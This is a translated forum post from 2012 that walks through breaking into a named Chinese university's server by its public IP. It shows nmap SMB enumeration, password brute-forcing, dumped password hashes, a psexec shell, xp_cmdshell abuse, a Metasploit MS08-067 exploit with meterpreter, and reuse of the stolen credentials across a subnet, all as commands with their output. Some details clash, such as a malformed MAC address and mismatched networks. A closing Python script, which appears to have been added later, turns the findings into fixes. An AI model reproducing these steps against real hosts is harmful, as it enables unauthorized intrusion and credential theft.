nmap+msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // exploit the ms08-067 vulnerability against the target machine from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
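As an added example that is not part of the original post: a small Python audit script that turns the NSE host-script results shown above (smb-enum-shares, smb-brute, smb-pwdump, smb-check-vulns) into a list of things to fix. The sample block is constructed from the output in the post; the check on the LM hash's second half relies on LM hashing each 7-byte half of the password separately, so a second half equal to AAD3B435B51404EE means the password is at most 7 characters long.

```python
import re
# Constructed sample: the NSE host-script results shown in the post, gathered into one block.
SAMPLE = """\
| smb-enum-shares:
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""
EMPTY_LM_HALF = "AAD3B435B51404EE"  # LM hash of an empty 7-byte half => password is <= 7 chars

def split_sections(text):
    # Group NSE output lines under the '| script-name:' header they follow.
    sections, current = {}, None
    for line in text.splitlines():
        m = re.match(r"^\|_?\s*([a-z0-9-]+):\s*$", line)
        if m:
            current = m.group(1)
            sections[current] = []
        elif current and line.startswith("|"):
            sections[current].append(line.lstrip("|_ ").strip())
    return sections

def audit(text):
    # Turn the scan output into an ordered list of remediation findings.
    s, findings, share = split_sections(text), [], None
    for item in s.get("smb-enum-shares", []):
        if not item.startswith("Anonymous access"):
            share = item                      # a share name line, e.g. IPC$
        elif not item.endswith("<none>"):     # only anonymous access that is actually granted
            findings.append(f"{share}: anonymous {item.split(': ', 1)[1]} access")
    for item in s.get("smb-brute", []):
        if " => " in item:                    # e.g. test:123456 => Login was successful
            user, pw = item.split(" => ", 1)[0].split(":", 1)
            findings.append(f"{user}: {'blank' if pw == '<blank>' else 'guessable'} password")
    for item in s.get("smb-pwdump", []):      # user:rid => LMhash:NThash
        name, lm = item.split(":", 1)[0], item.split(" => ", 1)[1].split(":", 1)[0]
        if lm.startswith("NO PASSWORD"):
            findings.append(f"{name}: empty password")
        else:
            findings.append(f"{name}: LM hash stored (disable LM hash storage)")
            if lm[16:] == EMPTY_LM_HALF:
                findings.append(f"{name}: password is 7 characters or fewer")
    for item in s.get("smb-check-vulns", []):
        if item.endswith("VULNERABLE"):
            findings.append(f"missing patch: {item.split(':', 1)[0]}")
    return findings
```

Every line it reports is a configuration to correct on the host: no anonymous access to IPC$, no blank or trivial passwords, no LM hashes kept in the SAM, and the MS08-067 patch applied.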